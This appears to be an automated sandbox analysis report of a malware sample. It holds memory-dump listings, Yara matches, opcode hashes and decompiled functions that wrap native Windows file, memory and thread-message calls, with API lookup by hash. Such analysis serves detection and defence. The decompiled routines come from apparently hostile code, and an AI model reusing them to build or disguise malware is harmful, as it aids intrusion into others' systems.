                                  • Instruction Fuzzy Hash: 75B1C86244E3D1AFC7534B744CA56827FB0AE53214B5F85EBC4C2CF5A3E219185AC7A3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d486f61b35694fb453d29a92a65022c8c08ed11700784013d9ac024f8038054f
                                  • Instruction ID: 588fd812e725e5daf47822622646fafd394152409744fe0546a6735ccd751cc3
                                  • Opcode Fuzzy Hash: d486f61b35694fb453d29a92a65022c8c08ed11700784013d9ac024f8038054f
                                  • Instruction Fuzzy Hash: 22A17C36E112098FCF15DFA5C8449DEBBF6FF89300B15856AE805BB261EB71A945CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  APIs
                                  • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 2MA$2MA
                                  • API String ID: 2738559852-947276439
                                  • Opcode ID: 171758033c0c55603c32c5ab92d4b9521515d23d63aa1bfbeb9a1c096735890f
                                  • Instruction ID: 89f0697d20aa7e5aa07c062835c0dd6e678ddd8087c8e97a0c764592e2c166f1
                                  • Opcode Fuzzy Hash: 171758033c0c55603c32c5ab92d4b9521515d23d63aa1bfbeb9a1c096735890f
                                  • Instruction Fuzzy Hash: A7117CB2200104BFDB14DF99DC91EEB77ADEF8C724F05864AFA1C97241C630E8518BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 2MA$2MA
                                  • API String ID: 2738559852-947276439
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: wKA
                                  • API String ID: 823142352-3165208591
                                  • Opcode ID: 1baabf4f3e5987b0d1137696199ab20d065deca4cbe244786198252afe9aba08
                                  • Instruction ID: 3259957352d79b0641e44d88ff33b2a0f21cf3a8ea7235da9a9aacad622f17b2
                                  • Opcode Fuzzy Hash: 1baabf4f3e5987b0d1137696199ab20d065deca4cbe244786198252afe9aba08
                                  • Instruction Fuzzy Hash: 5F1135B6214108AFCB08CF98EC91DEB77ADEF8C754B14864DFA5D97241C630E952CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: wKA
                                  • API String ID: 823142352-3165208591
                                  • Opcode ID: aa2e372d16a216e1a790e9c4bdf35330398a213de013c03327491d0962fab78d
                                  • Instruction ID: 4afd77b747acf5b5c95aa5f1665348eba6ffc6453c8dc3a9f136bb3a8bb343d0
                                  • Opcode Fuzzy Hash: aa2e372d16a216e1a790e9c4bdf35330398a213de013c03327491d0962fab78d
                                  • Instruction Fuzzy Hash: 9E01E8B2200508AFCB18DF98DC95EDB77AAFF8C754F118659FA1D97240C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: wKA
                                  • API String ID: 823142352-3165208591
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                  • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                  • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                  • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00419F2D(void* __ebx, signed int __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                  				signed int _v117;
                                  				long _t16;
                                  				void* _t26;
                                  
                                  				_v117 = _v117 | __edx;
                                  				_t12 = _a4;
                                  				_t5 = _t12 + 0xc60; // 0xca0
                                  				E0041A950(_t26, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                  				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                  				return _t16;
                                  			}






                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 858d8ab863f1e1ad308eac448e9d7a9eddde1b8dc3804591941fcc246853f179
                                  • Instruction ID: b00c71b828885dc6a9c4465762eeb29b076ab44201cfba4c4d1e4c2f359be21c
                                  • Opcode Fuzzy Hash: 858d8ab863f1e1ad308eac448e9d7a9eddde1b8dc3804591941fcc246853f179
                                  • Instruction Fuzzy Hash: 92F0F8B1210208AFCB18DF99CC91EEB77ADAF88354F118559BA19A7251C631E811CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                  				long _t14;
                                  				void* _t21;
                                  
                                  				_t3 = _a4 + 0xc60; // 0xca0
                                  				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                  				return _t14;
                                  			}





                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00419E7A(void* __edx, intOrPtr _a4, void* _a8) {
                                  				void* _v117;
                                  				long _t9;
                                  				void* _t16;
                                  
                                  				asm("sbb esi, [ebx]");
                                  				_t6 = _a4;
                                  				_t3 = _t6 + 0x10; // 0x300
                                  				_t4 = _t6 + 0xc50; // 0x40a913
                                  				E0041A950(_t16, _a4, _t4,  *_t3, 0, 0x2c);
                                  				_t9 = NtClose(_a8); // executed
                                  				return _t9;
                                  			}






                                  APIs
                                  • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: d2d2a761dcf187d18d314f5f1b47fc7e8a19f3b782eedd61401ceda2748be3b7
                                  • Instruction ID: cb64cfc0f1a723e84020248d5c05ad5cb27ad0bb46e88afc4a64298daebd7fa6
                                  • Opcode Fuzzy Hash: d2d2a761dcf187d18d314f5f1b47fc7e8a19f3b782eedd61401ceda2748be3b7
                                  • Instruction Fuzzy Hash: 32E04F766001106FDB10DBB5CC95EE77B28EF49350F154599F958AB242C531A504C690
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00419E80(intOrPtr _a4, void* _a8) {
                                  				long _t8;
                                  				void* _t11;
                                  
                                  				_t5 = _a4;
                                  				_t2 = _t5 + 0x10; // 0x300
                                  				_t3 = _t5 + 0xc50; // 0x40a913
                                  				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                  				_t8 = NtClose(_a8); // executed
                                  				return _t8;
                                  			}





                                  APIs
                                  • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                                  • Instruction ID: e0d7bd5a6bfadb0fcf8a9769120b48ce2fc73b95c2fcb489c00796d59b3111b5
                                  • Opcode Fuzzy Hash: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                                  • Instruction Fuzzy Hash: 159002A134100442D10061994418B160045E7E2381F51C115E6058664DC659CD6A7166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
                                  • Instruction ID: c0a67213e876ddc94ff44a26181adf9b9571e8130a3221a5a2f75721572d34a8
                                  • Opcode Fuzzy Hash: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
                                  • Instruction Fuzzy Hash: 639002B120100402D140719944087560045A7D1381F51C111AA058664EC6998EED76A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
                                  • Instruction ID: f827235518f72a7f2a7cd8b4585fce2c55a9ab870967542bb86f9271b82ec0f8
                                  • Opcode Fuzzy Hash: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
                                  • Instruction Fuzzy Hash: D190026160100502D10171994408626004AA7D13C1F91C122A6018665ECA658AAAB171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
                                  • Instruction ID: bef7ba3e9815b109828608e67f244e5e57fe8e431f3f91bcd85f29a57f8d1435
                                  • Opcode Fuzzy Hash: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
                                  • Instruction Fuzzy Hash: 6D900261242041525545B19944085174046B7E13C1791C112A6408A60CC566996EE661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
                                  • Instruction ID: 59582e93a4f2b8ff026664278bfab83939b668397f0134720f2fac7466491af9
                                  • Opcode Fuzzy Hash: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
                                  • Instruction Fuzzy Hash: 6C90027120100413D111619945087170049A7D13C1F91C512A5418668DD6968A6AB161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
                                  • Instruction ID: 8a269b114d62fb0afead7509322cc703d795562e47fcffdeafc1662ae4cfec49
                                  • Opcode Fuzzy Hash: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
                                  • Instruction Fuzzy Hash: 8E90027120140402D1006199481871B0045A7D1382F51C111A6158665DC665896975B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
                                  • Instruction ID: 88d89b5a93e372a4e84e2193eb4505eed67cfb02ded18c74ccfbf1a2d44d1a42
                                  • Opcode Fuzzy Hash: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
                                  • Instruction Fuzzy Hash: CF90026160100042414071A988489164045BBE2391751C221A598C660DC599897D66A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
                                  • Instruction ID: 98dc01b99683be868e95991aceaca76167560267beff6c61491cc8353f788467
                                  • Opcode Fuzzy Hash: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
                                  • Instruction Fuzzy Hash: D690026121180042D20065A94C18B170045A7D1383F51C215A5148664CC95589796561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
                                  • Instruction ID: a26870dda83c28240fed10a6da1ad643e0199de0f08acfcde9f39b61c7925acb
                                  • Opcode Fuzzy Hash: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
                                  • Instruction Fuzzy Hash: 869002A120200003410571994418626404AA7E1381B51C121E60086A0DC56589A97165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
                                  • Instruction ID: 25d3dc18543222bc226cfe4ad701c217de339c281b13f7a78db9e78f92bf21e0
                                  • Opcode Fuzzy Hash: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
                                  • Instruction Fuzzy Hash: B9900265211000030105A59907085170086A7D63D1351C121F6009660CD66189796161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
                                  • Instruction ID: 8bae8b49cea459c22722bfb571b02aa536d9146785cf1ec7446fd74d5bb2cfac
                                  • Opcode Fuzzy Hash: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
                                  • Instruction Fuzzy Hash: 7290026921300002D1807199540C61A0045A7D2382F91D515A5009668CC955897D6361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
                                  • Instruction ID: be3ce218bbf776591d00267c21f068cd6729aac63d2bcb0d7a527258008e5d6e
                                  • Opcode Fuzzy Hash: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
                                  • Instruction Fuzzy Hash: B690026130100003D1407199541C6164045F7E2381F51D111E5408664CD955896E6262
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
                                  • Instruction ID: 4fcf1ab5422ba200f23f3f4c5d2b7e2de0ea2edc15f0f70b43ab4f30021315b9
                                  • Opcode Fuzzy Hash: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
                                  • Instruction Fuzzy Hash: 2990027120100402D10065D9540C6560045A7E1381F51D111AA018665EC6A589A97171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
                                  • Instruction ID: 6e55cf9ecf6c0dd0d2ca79c131fd3c9bd80e851aee30bf829a01120951751849
                                  • Opcode Fuzzy Hash: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
                                  • Instruction Fuzzy Hash: 1590027120108802D1106199840875A0045A7D1381F55C511A9418768DC6D589A97161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
                                  • Instruction ID: fe93457a4fcad1289ec6382bf934db5aea854220ef0c0c432154f865c6ada710
                                  • Opcode Fuzzy Hash: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
                                  • Instruction Fuzzy Hash: D190027120100802D1807199440865A0045A7D2381F91C115A5019764DCA558B6D77E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                  • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                  • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                  • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00408286(void* __eax, void* __ebx, void* __eflags, intOrPtr* _a4, long _a12) {
                                  				void* __esi;
                                  				int _t8;
                                  				void* _t18;
                                  				void* _t20;
                                  				long _t22;
                                  				void* _t24;
                                  				int _t25;
                                  				void* _t27;
                                  
                                  				0x7fae19f5();
                                  				if(__eflags > 0) {
                                  					_push(_t27);
                                  					asm("rcl byte [edx-0x7d], 0xc6");
                                  					asm("sbb al, 0x56"); // executed
                                  					E0040ACC0(); // executed
                                  					_t8 = E00414E10(_t24, __ebx, 0, 0, 0xc4e7b6d6);
                                  					_t25 = _t8;
                                  					__eflags = _t25;
                                  					if(_t25 != 0) {
                                  						_t22 = _a12;
                                  						_t8 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                  						__eflags = _t8;
                                  						if(__eflags == 0) {
                                  							_t8 =  *_t25(_t22, 0x8003, _t27 + (E0040A450(__eflags, 1, 8) & 0x000000ff) - 0x40, _t8);
                                  						}
                                  					}
                                  					return _t8;
                                  				} else {
                                  					asm("adc byte [ebp-0x75], 0xec");
                                  					_push(_t27);
                                  					_t20 = E0041B160(_t18);
                                  					if(_t20 == 0 || _t20 == 0x33333333) {
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						return  *_a4 + _t20;
                                  					}
                                  				}
                                  			}












                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 3333
                                  • API String ID: 1836367815-2924271548
                                  • Opcode ID: f3badf50578ce9ca8ce948d1da6c5dee2300726f84e556e8052460cf00dc0e24
                                  • Instruction ID: 2aafc0e0c50240cc4be676c4595c3ee4b597918a6ed0d1e9c7cd7858e8fea17c
                                  • Opcode Fuzzy Hash: f3badf50578ce9ca8ce948d1da6c5dee2300726f84e556e8052460cf00dc0e24
                                  • Instruction Fuzzy Hash: A40124317407193AEB2466685D42F7E62489F81F20F08417FFE88FA2C1DEBDA81102DA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
                                  				void* _t10;
                                  				void* _t15;
                                  
                                  				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                  				_t4 =  &_a16; // 0x414c6f
                                  				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
                                  				return _t10;
                                  			}






                                  APIs
                                  • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: oLA
                                  • API String ID: 1279760036-3789366272
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 42%
                                  			E004082E8(intOrPtr* __ebx, void* __esi, long _a8) {
                                  				char _v63;
                                  				char _v64;
                                  				long __edi;
                                  				void* _t9;
                                  
                                  				asm("in al, dx");
                                  				 *__ebx =  *__ebx + __esi;
                                  				if( *__ebx > 0) {
                                  					return _t9;
                                  				} else {
                                  					__esi = __esi + 1;
                                  					asm("adc [ebp-0x75], dl");
                                  					_push(__ebp);
                                  					__ebp = __esp;
                                  					__esp = __esp - 0x40;
                                  					_push(__esi);
                                  					__eax =  &_v63;
                                  					_v64 = 0;
                                  					E0041B850( &_v63, 0, 0x3f) = E0041C3F0( &_v64, 3);
                                  					__esi = _a8;
                                  					_push(__ebp);
                                  					asm("rcl byte [edx-0x7d], 0xc6");
                                  					asm("sbb al, 0x56"); // executed
                                  					E0040ACC0(); // executed
                                  					__eax = E00414E10(__esi, __eax, 0, 0, 0xc4e7b6d6);
                                  					__esi = __eax;
                                  					__eflags = __esi;
                                  					if(__esi != 0) {
                                  						_push(__edi);
                                  						__edi = _a8;
                                  						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
                                  						__eflags = __eax;
                                  						if(__eflags == 0) {
                                  							__eax = E0040A450(__eflags, 1, 8);
                                  							__eax = __al & 0x000000ff;
                                  							__eax =  *__esi(__edi, 0x8003, __ebp + (__al & 0x000000ff) - 0x40, __eax);
                                  						}
